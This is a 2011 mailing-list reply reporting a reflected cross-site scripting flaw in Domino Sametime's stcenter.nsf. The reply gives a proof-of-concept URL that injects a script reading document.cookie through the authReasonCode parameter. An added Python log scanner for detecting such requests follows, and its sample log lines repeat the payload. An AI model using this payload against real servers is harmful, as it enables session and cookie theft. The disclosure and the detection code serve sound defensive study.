Re: Domino Sametime Multiple Reflected Cross-Site Scripting

barkleyusa.net
Date: Tue Feb 22 2011 - 07:08:15 CST


Hi,

I discovered similar XSS affecting Domino Sametime some time ago...

This XSS affects other scripts also...

i.e. stcenter.nsf

Here's an example:

/stcenter.nsf?OpenDatabase&authReasonCode="><script>alert(document.cookie);</script>"

Cheers

Andrew
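
From the defender's side, requests like the one in this post can be found in web server access logs by decoding the `authReasonCode` parameter and checking it against an allow-list. The following is an added example, not part of the original post or of any IBM tooling; the Common Log Format input, the function names, and the assumption that a legitimate `authReasonCode` is a short alphanumeric token are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate authReasonCode is a short alphanumeric token.
SAFE_VALUE = re.compile(r"[A-Za-z0-9]{1,16}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def auth_reason_codes(uri):
    """Return decoded authReasonCode values from a Domino-style query string."""
    values = []
    for part in urlsplit(uri).query.split("&"):
        name, sep, value = part.partition("=")
        if sep and name.lower() == "authreasoncode":
            values.append(decode_fully(value))
    return values

def flag_suspicious(log_lines):
    """Return (line_number, value) for every value outside the allow-list."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        for value in auth_reason_codes(match.group(1)):
            if not SAFE_VALUE.fullmatch(value):
                hits.append((number, value))
    return hits

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Feb/2011:07:01:02 -0600] "GET /stcenter.nsf?OpenDatabase&authReasonCode=2 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [22/Feb/2011:07:02:10 -0600] "GET /stcenter.nsf?OpenDatabase&authReasonCode=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E%22 HTTP/1.1" 200 5188',
    '192.0.2.12 - - [22/Feb/2011:07:03:44 -0600] "GET /stcenter.nsf?OpenDatabase&authReasonCode=%2522%253E%253Cb%253E HTTP/1.1" 200 5131',
    '192.0.2.13 - - [22/Feb/2011:07:04:00 -0600] "GET /stcenter.nsf?OpenDatabase HTTP/1.1" 200 5120',
]
```

The same allow-list check, applied server-side before the value is written into the response, is the corresponding input-validation control; it complements output encoding and does not replace it.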